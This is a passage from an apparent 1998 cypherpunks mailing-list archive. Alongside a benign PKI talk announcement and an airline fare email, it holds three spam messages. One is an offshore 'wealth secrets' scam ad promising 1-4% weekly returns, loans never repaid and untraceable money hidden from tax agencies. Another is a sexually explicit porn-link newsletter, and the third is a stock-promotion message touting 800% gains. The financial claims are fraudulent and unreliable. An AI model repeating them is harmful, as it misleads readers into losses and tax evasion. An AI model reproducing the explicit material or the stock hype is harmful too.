~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Revealing the secrets which have been made others so fabulously wealthy.

OFFSHORE SPECIAL REPORT #5599

* UNFAIR & DISCRIMINATORY Divorce Settlements are Obsolete in This Report!
* RUTHLESS Creditors Will CRINGE If They Know You Have Read This Report!
* Lawyers May GO BROKE By You Reading This Report!
* HEARTLESS Tax Agencies See RED When They Read This Report!
* SNEAKY Politicians Use The Information In This Report Everyday!
* Your GREEDY Banker Does Not Want You To Read This Report!
* This Report is BLACK BALLED By Most Government Agencies!
* BACK STABBING Relatives HATE This Report!

CHANCE FOR THE LITTLE GUY TO GET RICH! 
(And The Rich To Get Even Richer!)

It's true! There's very little time left 
for the little guy to get rich in the U.S. 
and many other countries. Strict rules 
and regulations that have been adopted 
by the U.S. government making it hard to 
start and run a business - own a home - 
raise a family - and just get ahead. Banks 
and lending institutions will only loan 
money if you have it to begin with. You 
know the saying "It takes money to make 
money". Well the little guy can barely 
pay their everyday living expenses much 
less find money to make money! The people 
in the U.S. that have money are definitely 
MAKING MONEY! But you will be surprised 
how they are doing it this day and age.

THE RICH ARE GOING OFFSHORE!

The Rich get richer by applying the most 
powerful wealth-building secrets known 
today. Many of these millionaires are 
building their empires Offshore (outside 
their home countries) while doing business 
inside their countries - using legal tax 
shelters to protect what they have earned. 
New tax laws have forced many of the rich 
offshore where they can legally do business 
without the tax liabilities.

The Key Is Borrowing Money Then Making 
It Work By Leveraging It!

The Ability to acquire money by borrowing 
then leveraging what you have borrowed is 
the key to wealth building and we are going 
to teach you how you can do the same even 
if you have little or no money to start. 

THE WEALTH SECRET!

America's super wealthy have all used the 
same wealth building strategy to get where 
they are today as they have for decades. 
Use someone else's money to become rich - 
it's very simple - you know it - I know it. 
But the problem is how do we convince 
someone to let YOU borrow the money so YOU 
can make it work as the rich do?

THE OFFSHORE SPECIAL REPORT #5599!

In this report you will have everything you 
need to get started - started on your way 
to joining the elite - the 2% to 5% of U.S. 
citizens - the RICH...

Here's The Highlight Of What Report #5599 Offers...

<> How the RICH & POLITICIANS get even richer using trusts and how you can do the same!
<> Incorporate Offshore -- Completely private & away from your government's regulation!
<> Your own secret offshore mailing address -- No one will know your real address!
<> Offshore private checking accounts -- Deposit money & pay your bills from offshore - no paper trails!
<> Offshore Tax Havens -- Legally delay or eliminate taxes -No one knows - not even your government!
<> Offshore IBC's and Trusts -- Asset protection from creditors & your government!
<> High yield offshore investments opportunities -- Find out how the rich make from 1% to 4% a week on their money - offshore & tax free - you can do the same!
<> Money making opportunities -- Secrecy is a thriving industry!

This report also tells you additional 
information about how the rich borrow 
money using Roll Over Programs and Tax 
FREE Self-Liquidating Loan  concept 
and never repay one penny! These 
Self-Liquidating Loans are done 
offshore. This is just one more 
technique the rich use -- USING SOMEONE 
ELSE'S MONEY TO MAKE MONEY for themselves. 
You will have the opportunity to do the same!

WHO NEEDS THIS REPORT?

<> People who have a J.O.B. and have "more month than money" - (JOB = just over broke!)
<> People who are self-employed - Paying that SELF EMPLOYMENT TAX and are prime candidates for LAW SUITS from every direction!
<> People who are sick and tired of frivolous law suits - Did you know that in the U.S. there are 2.67 lawyers for every 1,000 people? These lawyers are HUNGRY and need to sue someone for any reason to survive!
<> Professional people such as doctors, technicians, architects, stock brokers, accountants, and YES even lawyers! - You know those people in the HIGHER THAN AVERAGE tax brackets!
<> People who are getting married or are married and plan on living happily ever after - Now back to reality - the U.S. has a divorce rate that exceeds 60% every year!
<> Partners who want to make sure their partnership is a true 50-50 deal now and in future.
<> People who live in a country that has strict rules and regulations limiting where and how they can run their business and manage their money.
<> People who want to retire but can not afford to because of lack of income or the rules put upon them from their government - restricting them from receiving a decent income.
<> People who are HIGH audit risks or have been audited by their government' dictatorial tax agency - You know GUILTY UNTIL PROVEN INNOCENT!
<> People who are paying their government 40% to 60% in taxes and are sick and tired of doing so!
<> People who are close to bankruptcy and need to find solution as soon as possible - 20% to 40% of the people in the United States are a paycheck away from bankruptcy - Yes those people!
<> People who want to make sure their children receive 100% of their inheritance without the government stealing it away!
<> People who want to keep their business and personal affairs PRIVATE - Hard to do this day and age with all the computers!
<> People who have the dream of financial independence and want to make thousands a week running their own home based business!
<> People who want to get a FRESH start in life.
<> Anyone that has a desire to get ahead and the fortitude to make it big and join the 2% to 5% - the RICH!

THE RICH NEED THIS REPORT ALSO!

But what is really surprising is the people 
with money need this report! Even the chosen 
few that have a few dollars and are frustrated 
with the return on their investments. They 
need this report to find out how they can 
make 1% to 4% on their money every week - 40 
weeks out of the year. It's being done right 
now - 40 times in a year by a chosen few!  If 
you're not getting those types of return, even 
if you have only a few thousands to invest, you 
need this report to find out how! Plus find out 
how the rich have been amassing fortunes 
receiving those type of returns for decades 
and most of the time tax FREE!!!

But Wait -- Soon You Will Be Among The Chosen Few!

All it takes to receive the Offshore Special 
Report Number 5599 is $50.00 U.S. -- that's it! 
You probably spent that on a movie or a night 
on the town. $50 US to find out how you can 
beat the system, how you can join the rich - 
start making what only a few are making - 
now that is not really asking too much is it?

FREE BONUS #1
Make 1000% Selling This Report!

When you order the Offshore Special Report 
Number 5599 you will receive a Certificate 
Of Registration allowing you FULL REPRINT 
RIGHTS to duplicate the report and sell it 
to whoever and wherever you wish! You keep 
ALL OF THE MONEY. PAY US NOTHING! The Offshore 
Special Report #5599 will explain how you 
can do it.


SPECIAL OFFER!!
---------------------------------------------------------------------------
Those who order the report by January 16, 1998 are 
eligible to receive FREE BONUS #2, #3, #4 and #5 below.
--------------------------------------------------------------------------

FREE BONUS #2
Self-Liquidating Loan Report

YES... It's possible to borrow thousands and 
never repay one penny! This remarkable system 
is explained in the manual and there are no 
credit checks, cosigners or employment 
verifications. After reviewing this report 
you could put your own Self-Liquidating Loan 
together in matter of days -- right in your 
home town -- for any reason or idea!

A "Self-Liquidating" loan is a  financial 
arrangement in which the elements of  "Arbitrage", 
"Compensating Balance" and "Advanced-Point 
Funding" are utilized. To explain each of these 
three topics would take pages, but to sum it 
up it means money that is "borrowed" NEVER has 
to be repaid! I MEAN NEVER! Since the lender 
(the Bank) deducts a "Compensating Balance" 
from the proceeds of your loan at the end of 
the term, the loan is "ROLLED OVER" or PAID OFF 
by the "Compensating Balance" funds withheld 
when the loan is made. This way, you never have 
to worry about making any loan payments. EVER! 
Now you can see why this is so remarkable! 
Truly unique!

FREE BONUS #3

"How To Make Sure You Make Money From A Web Site"
Things often overlook by most new comers. Avoid those 
mistake if you want to make money from your web site.

FREE BONUS #4

The "Guerilla Guide to Bulk E-Mail": 
This exclusive report tells it like it really is! 
Bulk E-Mail is the most powerful method of marketing 
ever... but also the most controversial! What other 
method of marketing provides you with the means to 
reach millions of potential customers for pennies?
There is more to it than most would have you 
believe... and there is more to it than sending
thousands of people your sales letter and waitng 
for the money to roll in. You can make money with
"Bulk E-Mail.

FREE BONUS #5

The "Insiders" Guide To Search Engine Secrets: 
Forget "refreshing" pages, colored keywords and 
Search Engine spamming! Those outdated methods 
were used in the beginning... they don't work 
today. We know of one report currently being 
sold for $29.95 that states the above
as a way to achieve a "Top 10 Listing" with 
the major Search Engines... Hogwash!! 
This "Insiders" guide will show you exactly
how to achieve a top listing using this new 
technology. 

Once again all of this is yours for only $50 plus $5 S&H...
So order now! Complete the following form and mail it with 
your payment today and take advantage of 
the FREE BONUSES!



________________CUT HERE _________________

_____Yes, I am ordering within the allotted time period. I understand 
I will receive ALL the FREE bonuses *)

_____ I order after January 16, 1998. I understand I 
have full reprint rights and can sell the report #5599 
KEEPING ALL THE MONEY.

*) We will check the post mark out.

Payment method:
For those who live in the countries listed below**) please send the money
using Postal Service. Other countries please send International
Money Order (no personal checks please).

*** Make Money Orders payable to Mahirudin Masri ***

Mail to: 

Tromol Pos 105
Yogyakarta 55002
Indonesia

First and last name: _____________________________________

Address: _____________________________________________

City: ____________________State:______ZIP/postal code: __________

Country: ___________________________

E-mail address: ______________________________________

Date: _______________________________


Code: tiga03 (do not remove this)

________________CUT HERE _________________

**)
Austria, Brasil, Brunei D, Germany, Japan, Malaysia, Netherland,
Philippine, Singapore, South Korea, Taiwan, Thailand, U.S.A.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Jan 1998 10:30:22 -0800 (PST)
To: dcsb-announce@ai.mit.edu
Subject: DCSB: Michael Baum; PKI and the Commercial CA
Message-ID: <v04003923b0e156006cc7@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

              The Digital Commerce Society of Boston

                            Presents

                        Michael S. Baum
                         VeriSign, Inc.

                        PKI Requirements
                             from a
                   Commercial CA's Perspective

                    Tuesday, February 3, 1997
                           12 - 2 PM
               The Downtown Harvard Club of Boston
                  One Federal Street, Boston, MA


Requirements for the provision of commercial certification products and
services are under consideration by many companies. Similarly, efforts to
regulate certification authorities (CAs) and public key infrastructure (PKI)
are proliferating by many domestic and foreign governments. Underlying many
of these efforts is the intention to assess and assure quality and
trustworthiness, and yet the nature, scope and regime to accomplish these
goals remain elusive or at least have been balkanized.

This presentation will consider CA and PKI requirements from the experiences
and perspective of a commercial CA. It will survey current approaches to
ascertaining quality and performance as well as their limitations. It will
then propose a path forward. Many of these issues are present real
challenges to both the CAs and the user community. A lively dialog is
welcomed.


Michael S. Baum is Vice President of Practices and External Affairs,
VeriSign, Inc.  His responsibilities include developing practices and
controls under which VeriSign conducts its public Digital ID and private
label certificate operations.

Mr. Baum is the Chair of the Information Security Committee, and Council
Member of the Section of Science and Technology, of the American Bar
Association. He is Chairman of the International Chamber of Commerce (ICC)
ETERMS Working Party and a Vice Chairman of the ICC's Electronic Commerce
Project, a delegate to the United Nations Commission on International Trade
Law on behalf of the ICC. He is a member of various digital signature
legislative advisory committees.

Mr. Baum is co-author (with Warwick Ford) of Secure Electronic Commerce
(Prentice Hall, 1997), author of Federal Certification Authority Liability
and Policy - Law and Policy of Certificate-Based Public Key and Digital
Signatures (NIST, 1994), co-author of Electronic Contracting, Publishing and
EDI Law (Wiley Law Publications, 1991), and contributing author to EDI and
the Law (Blenheim Online, 1989), and the author of diverse information
security publications including the first American articles on EDI law. He
was honored as an EDI Pioneer in 1993 (EDI Forum) and was the Recipient of
the National Notary Association's 1995 Achievement Award. He is a member of
the Massachusetts Bar.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, February 3, 1997, from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, on One Federal Street. The price for lunch is
$32.50. This price includes lunch, room rental, various A/V hardware, and
the speaker's lunch. ;-).  The Harvard Club *does* have dress code: jackets
and ties for men (and no sneakers or jeans), and "appropriate business
attire" (whatever that means), for women.  Fair warning: since we purchase
these luncheons in advance, we will be unable to refund the price of your
lunch if the Club finds you in violation of the dress code.

We will attempt to record this meeting for sale on CD/R, and to put it on
the web in RealAudio format, at some future date.


We need to receive a company check, or money order, (or, if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
January 31st, or you won't be on the list for lunch.  Checks payable to
anyone else but The Harvard Club of Boston will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston", in the amount of $32.50. Please include your e-mail
address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Upcoming speakers for DCSB are:

March     Joseph Reagle       "Social Protocols": Meta-data
                               and Negotiation in Digital Commerce
April     Adam Shostack       Digital Commerce Security:
                               Beyond Firewalls
May       Jeremey Barrett     Digital Bearer Certificate Protocols


We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to <mailto: majordomo@ai.mit.edu> . If
you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to <mailto: majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.3

iQEVAwUBNLutasUCGwxmWcHhAQGiBwf6A7rhL5aztElh5nDDLgGU7vjBdXuryH+x
OKnzXLE5364SLIr5KoRIfjRU0WB07jtB8bKeaE9DeiZbSC5i6QODmzK3cBfljVUx
Ju5pBKeTwcvVtDXzcBjB9swL2TvNtv77x7dQLitZmziMjgX2tUR1yPhdbRnsJ0kl
8kBuWl681sh3oPEq4fGXTVDcP/vx31riZkZHhVcFHG/vyfR4eUznKe0lq1L1babb
mwro6uPZ0W5Sy6F9rllqdPVbXGTh6LxlGwWbcBf9oO8+D+HAZAtjNm80WhtpN8aF
Kbd115jJgkxdUlBeU44gib1r2ViV0rvNBI6sW/jwyUzYGQYhnyDJpg==
=2cOQ
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Tue, 13 Jan 1998 15:27:13 -0800 (PST)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19980113212723.6980.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Trans World Specials for
 January 13, 1998.  All tickets must be
 purchased by January 16, 1998.  Fares
 are valid for travel originating
 1/17/98 and returning 1/19/98 or
 1/20/98.  
 
 We have some great fares to great cities
 for you again this week.  Call right away
 and take advantage.  Have you read about
 our new Trans World First service?  Read
 about it at http://www.twa.com
 
 On to this week's Trans World Specials.
 
 
 Roundtrip Fare:		To/From:
 
 $69			St. Louis (STL) / Nashville (BNA)
 $69			Washington, DC (National) / New York (JFK) *
 			
 			* TWA Flights only. Trans World Express excluded
 
 
 $79			Detroit (DTW) / New York (JFK)  nonstop only
 
 
 $99			Chicago (ORD) / New York (JFK)  nonstop only
 $99			St. Louis (STL) / Atlanta (ATL)
 $99			St. Louis (STL) / Washington, DC (National only)
 
 
 $129			Cedar Rapids (CID) / Atlanta (ATL)
 $129			Hartford (BDL) / Houston (HOU)
 $129			Lincoln (LNK) / Atlanta (ATL)
 $129			Nashville (BNA) / Salt Lake City (SLC)
 $129			St. Louis (STL) / Colorado Springs (COS)
 $129			St. Louis (STL) / Hartford (BDL)
 $129			St. Louis (STL) / Houston (HOU)
 $129			St. Louis (STL) / New York (LGA)
 $129			St. Louis (STL) / Norfolk (ORF)
 $129			St. Louis (STL) / Toronto (YYZ) **
 $129			Colorado Springs (COS) / Toronto (YYZ) **
 $129			San Antonio (SAT) / Toronto (YYZ) **
 
 
 $159			Boston (BOS) / Colorado Springs (COS)
 $159			Hartford (BDL) / Colorado Springs (COS)
 $159			Nashville (BNA) / Ontario, CA (ONT)
 $159			Nashville (BNA) / Portland, OR (PDX)
 $159			Nashville (BNA) / San Jose, CA (SJC)
 $159			New York (LGA) / Colorado Springs (COS)
 $159			Norfolk (ORF) / Colorado Springs (COS)
 $159			St. Louis (STL) / Ontario, CA (ONT)
 $159			St. Louis (STL) / Portland, OR (PDX)
 $159			Washington, DC (National) / Colorado Springs (COS)
 
 
 $179			Boston (BOS) / Ontario, CA (ONT)
 $179			Hartford (BDL) / Ontario, CA (ONT)
 $179			Los Angeles (LAX) / New York (JFK)  nonstop only
 $179			New York (JFK) / Las Vegas (LAS)  nonstop only
 $179			Norfolk (ORF) / Ontario, CA (ONT)
 $179			Ontario, CA (ONT) / New York (LGA)
 $179			Ontario, CA (ONT) / Washington, DC (DCA)
 $179			Ontario, CA (ONT) / Toronto (YYZ) **
 
 ** Fares are valid for U.S. origins only.  Fares for Canadian origins may differ.
 All travel is valid on TWA only.
 
 Call TWA at 1-800-221-2000 and book your Trans World Special now.
 
 
 ******************************GETAWAY VACATIONS*************************
 
 Puerto Vallarta -- Sheraton Buganvilias includes:
 
 - roundtrip airfare
 - 2 nights hotel accommodations at the deluxe Sheraton Buganvilias Resort
 - airport transfers
 - 2000 bonus FFB miles in addition to actual mileage earned
 - only $399 from St. Louis
 - $459 from Chicago, Des Moines, Detroit, Indianapolis, Kansas City, Little Rock,
   Moline, Nashville, and Omaha.
 - $519 from Cincinnati, Cleveland, Columbus, Dayton, Milwaukee and Minneapolis
 
 
 London Theatre Week includes:
 
 - roundtrip airfare
 - Continental buffet breakfast
 - half-day sightseeing tour
 - tickets for 2 plays or musicals
 - choice of first-class or superior first-class hotel
 - bonus 5000 FFB miles in addition to actual mileage earned
 - valid for 2/6/98 or 2/27/98 departures
 - only $1099 from Chicago, Cincinnati, Dallas, Houston, Minneapolis and St. Louis
 - $1179	from Austin, Columbus, Dayton, Indianapolis, Kansas City, Oklahoma City
    San Antonio, and Tulsa
 
 For reservations call 1-800-GETAWAY (438-2929) today !	
 
 
 *********************************ALAMO**********************************
 
 Alamo offers these low rates for an economy car valid 1/17/98 - 1/19/98
 
 $16.99		Houston, San Antonio
 
 $17.99		Chicago, Detroit, Nashville, St. Louis, Toronto
 
 $18.99		Colorado Springs, Las Vegas, Portland (OR)
 
 $20.99		Atlanta, Hartford, Norfolk, Washington-DC, 
 
 $21.99		Los Angeles
 
 For reservations call Alamo at 1-800-GO-ALAMO and request rate code RT and
 ID # 443833. For online reservations access http://www.goalamo.com
 
 
 ********************************Hilton Hotels & Resorts*****************
 
 Hilton Hotels/Resorts offers these low rates valid the nights of 1/17/98-1/19/98
 
 
 $55	Washington National Airport Hilton, Arlington, VA (free airport shuttle, 	
         only 5 minutes from the sites of DC)
 
 $65	Galveston Island Hilton Resort, TX ( located directly on the beach; hotel
         offers tennis and outdoor pool)
 
 $69	Los Angeles Airport Hilton & Towers (free airport shuttle, fitness center, 
         outdoor pool and 12 restaurants)
 
 $79	Colonial Hilton & Resort, MA ( located 12 miles north of downtown Boston)
 
 $87	Detroit Metro Airport Hilton Suites ( suite accommodations, full american 
         breakfast and beverage reception)
 
 $88	O'Hare Hilton, Chicago ( connected to O'Hare via walkway, 18 miles from 
 	downtown)
 
 $99	The Capitol Hilton, Washington-DC ( in the heart of DC, 2 blocks from the
         White House)
 
 $131	Alanta Hilton & Towers ( pool, fitness center, tennis courts and easy 
         access to area attractions)
 
 For reservations call Hilton at 1-800-774-1500 and ask for Hilton Value Rates.
 Visit Hilton at http://www.hilton.com
 
 
 ***********************************TERMS & CONDITIONS*******************
 
 
 Airfare Terms and Conditions: 
 GENERAL CONDITIONS: Fares shown are round trip, nonrefundable and are subject to change. 
 Changes to itinerary are not permitted. Fares do not include Passenger Facility Charges of 
 up to $12 depending on itinerary. Must use E-Ticketing and credit card is the only form of 
 payment accepted. Offer is not available in conjunction with any other discount, coupon or 
 promotional offer. Seats are limited and may not be available on all flights or days of the
 week. Tickets must be purchased at time of booking and no later than 1/16/98. Standby 
 passengers not allowed. Valid for outbound travel on Saturday (1/17) and return Monday 
 (1/19) or Tuesday (1/20). Travel is effective 1/17/98 with all travel to be completed by 
 1/20/98. Minimum stay is 2 days. Maximum stay is 3 days. Travel to/from Canada a $6 US 
 departure tax is additional. 
 
 Getaway Conditions: 
 ALL PACKAGES: All packages include round-trip economy airfare. Price is per person based on 
 double occupancy and is subject to change. Availability, restrictions, surcharges, blackouts
 and cancellation penalties apply. No other discounts or promotions are valid in conjunction 
 with these packages. DOMESTIC CONDITIONS: Depart for Puerto Vallarta Tuesday or Sunday and 
 return Thursday or Tuesday. Travel valid for departures 2/3, 2/8 or 2/10 and return 2/5,
 2/10, or 2/12 LIMITED AVAILABLITY. Price does not include Passenger Facility Charges, US 
 departure, agricultural, customs & immigration tax of up to $54 per person. Full payment due
 by 1/19/98. 
 
 INTERNATIONAL CONDITIONS: Seats are limited and may not be available on all flights. Price 
 does not include Passenger Facility Charges, US departure/arrival, agriculture and security
 fees from point of origin of travel up to approximately $85 per person. Price includes 
 standard room - superior rooms have an additional charge. Full payment is required by 
 1/16/98.  
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day), registrations 
 fee/tax reimbursement, and airport access fees/taxes, if any, are extra. Optional CDW, 
 liability insurance, fuel, additional driver fee, drop charges and other optional items are
 extra. Rates higher for renters under age 25. Rates valid for rentals commencing on Saturday
 and ending by 11:59 PM on Tuesday. Rates only valid during week in which they are published 
 via TWA Internet site. A 24-hour advance reservation is required. Availability is limited. 
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during the specific week in which
 they are published via the TWA Hot Deals Internet site and the HiltonNet Internet site.
 Limited availability; rooms at these Hilton Value Rates are sold on a first-come, 
 first-served basis. Availability, rate, and terms of occupancy are not guaranteed and will
 be confirmed at time of reservation. Participating hotels, rates and terms are subject to 
 change without notice. Single or double occupancy. Early check-in, late check-out subject
 to availability. No extra charge for children when they stay in parents' or grandparents' 
 room; total room occupancy subject to local fire safety regulations and other applicable 
 laws or regulations. Rates vary by season, do not include any other fees or charges, 
 including without limitation state or local taxes or gratuities and are subject to change
 without notice. Advance booking required. Advance deposit may be required. Offer cannot be
 combined with any other special discounts, coupons, certificates, special rates, promotional
 offers, award stays, or meeting/group stays. Hilton reserves the right to cancel any Hilton
 Value Rate at any time without notice. Hilton is not responsible for the terms of other 
 offers in the program, or for any electronic, computer, telephone, security, virus or any 
 other problem or damage related to use of the program or its offers. 
 
 
 For reservations call 1-800-221-2000 (domestic) or 1-800-892-4141 (international) 
 or call your travel agent and ask for TWA's special Internet fares. 
 
 
 
 
 				
 
 
 		
 					
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Wed, 14 Jan 1998 03:59:26 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Wed Jan 14 '98
Message-ID: <19980114083127.9568.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Wednesday's issue of Eureka!

PUSSY PARADISE
Yet again Eureka! has managed  to negotiate a special week's
free access  to one of the web' s premier porn sites.  Pussy
Paradise is simply  packed with 100s  of videos (many live),
thousands of photos,  and so much more.  You will  need your
credit card as adult verification but it will not be charged
for your free week! So check it out - there's smut a plenty!
Pussy Paradise .... http://www.pussyparadise.com/eureka.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Web Master
http://204.254.71.39/veronica/
Veronica Summers Live XXX Play Room. What request do you
have for me. Do you want to see me suck dick and have it cum
all over my face.

ADULT ON THE WEB
Where has this site been hiding?  Well we have found it! Hot
pix of Ms. Nude Germany, Australia, France and Canada. These
are  some of the  best looking women  in the world.  Perfect 
tits, nice beavers. The site features four galleries in all.
Adult on the Web ................ http://free.desireone.com/

ABSOLUTE DREAM GIRLS
Score!  Lots of great free pix.  These chicks are hot!  Tits
in your face, ass, blondes, brunettes, clit rubbing oh yeah!
You have got to surf  this one!  Point your dick, er browser
to this  website for a real treat.  Nice  pussy spreads too!
Absolute Dream ............. http://203.108.65.75/freesite1/

NADIA'S NOOKIE NEST
Dick sucking, pussy poking, finger lickin good!  There is so
much bush in here you  might be shocked.  High quality, fast
loading  images.  Easy  to find  thumbnails.  This is a well 
built website.  Click this one for hot babes having hot sex.
Nadia's Nookie Nest .......... http://207.156.223.135/nadia/

SEX GALLERY
Facial city!  This site is loaded with chicks with loads all
over their faces!  It's a glob festival!  It's a cum shot in
her face, on her chin and  nose.  Check it out for yourself!
Sex Gallery .................... http://www.sex-gallery.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Teenage lesbian .. http://207.240.169.120/lesbian/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
RISQUE RENEE: With the  face  of  an  Angel  and a body that
would make you act like  the  Devil,  this young lady is the
complete package. Her  website  exhibits  many pictures, and
video clips. If you are into hot blondes Risqu Renee is NOT
to be missed!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
WifeSluts.com:  An  incredible  selection  of  true,  reader
submitted sex stories  detailing  the  private sexcapades of
real slut wives. A wide selection of submitted wife slut XXX
pics too! ........................ http://www.wifesluts.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?140
Pic  2 ........................... http://137.39.63.229/?141
Pic  3 ........................... http://137.39.63.229/?142
Pic  4 ........................... http://137.39.63.229/?143
Pic  5 ........................... http://137.39.63.229/?144
Pic  6 ........................... http://137.39.63.229/?145
Pic  7 ........................... http://137.39.63.229/?146
Pic  8 ........................... http://137.39.63.229/?147
Pic  9 ........................... http://137.39.63.229/?148
Pic 10 ........................... http://137.39.63.229/?149

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kouqi32@mci.net
Date: Tue, 13 Jan 1998 22:30:05 -0800 (PST)
To: kouqi32@mci.net
Subject: StockAlert News: UNFC expects increase of $50M in assets
Message-ID: <199801143911CAA36883@post.com.au>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
<HTML><PRE><BODY BGCOLOR="#ffffff"></P><P ALIGN=CENTER>
<FONT  COLOR="#000000" SIZE=3><B>REMINGTON-HALL CAPITALIZES ON RESURGENT REAL ESTATE MARKET 
 Company expects to acquire $50 million in assets by mid-1998</B>
</P><P ALIGN=LEFT>  
DALLAS --<FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> </B>), a diversified real estate investment firm formerly known as Universal Fuels Company, is quietly acquiring over $50 million in previously undervalued, undercapitalized or mismanaged commercial properties and
 making this new major player<FONT  COLOR="#0080ff" SIZE=3><B> </FONT><FONT  COLOR="#000000" SIZE=3></B>one of the best moderate-risk real estate investments in 1998.  
 
Founded in 1975 as Universal Fuels, the company provided uranium to the world as an alternative fuel, but as uranium became less used as a nuclear fuel source than other more economical and useful materials, Universal Fuels' stock declined almost to extinction over several years.  Less than a year ago the stock price was less than 1.
 
Four months ago officials from Camden-Townwest, a privately held real estate investment firm, approached Universal Fuels former management about converting Universal Fuels into a publicly traded real estate conglomerate.  Camden-Townwest, founded in 1994, grew from $19,000 in cash to $3 million in assets in three years without seeking any outside capital.  Since the change in management and corporate mission last October, <FONT  COLOR="#0080ff" SIZE=3><B> </B><A HREF="http://quote.yahoo.com/q?s=UNFC&d=t">U
NFC</A><B> <FONT  COLOR="#0080ff" SIZE=3></B> </FONT><FONT  COLOR="#000000" SIZE=3>has seen its stock value increase by over 800%.   
 
Remington-Hall<B>  </B>is now making its move to increase assets at a tremendous rate.  By mid-year management expects to acquire in excess of $50 Million in office buildings and multi-family properties at a significant discount to their market value. "We have been referred to as 'Cat Burglars of Real Estate'," said Douglas Fonteno, president & chief executive officer.   "And that's a title we hope to keep."
 
Larry Hood<B> <FONT  COLOR="#ffffff" SIZE=3>,</FONT><FONT  COLOR="#000000" SIZE=3></B>formerly Chief Operating Officer of Pizza Inn and Chief Financial Officer of Reliance Mortgage Company, is Remington-Hall's Chief Financial Offi
cer, giving the new company immediate and substantial financial integrity.  Wade Hyde, previously public relations and investor relations executive for Blockbuster Video and FoxMeyer Corporation, is Vice President of Marketing & Public Relations. 
 
Currently Remington-Hall<FONT  COLOR="#0080ff" SIZE=3><B> </FONT><FONT  COLOR="#000000" SIZE=3></B>is seeking to be listed on the Pacific Stock Exchange and the Nasdaq National Market.  The company anticipates announcing over $10 million in newly acquired assets by the end of January.
  
<B>Name:</B>		     Remington-Hall Capital Corporation<B> </B>( formerly Universal Fuels)
<B>Symbol:</B>	     Nasdaq:<FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> </B>
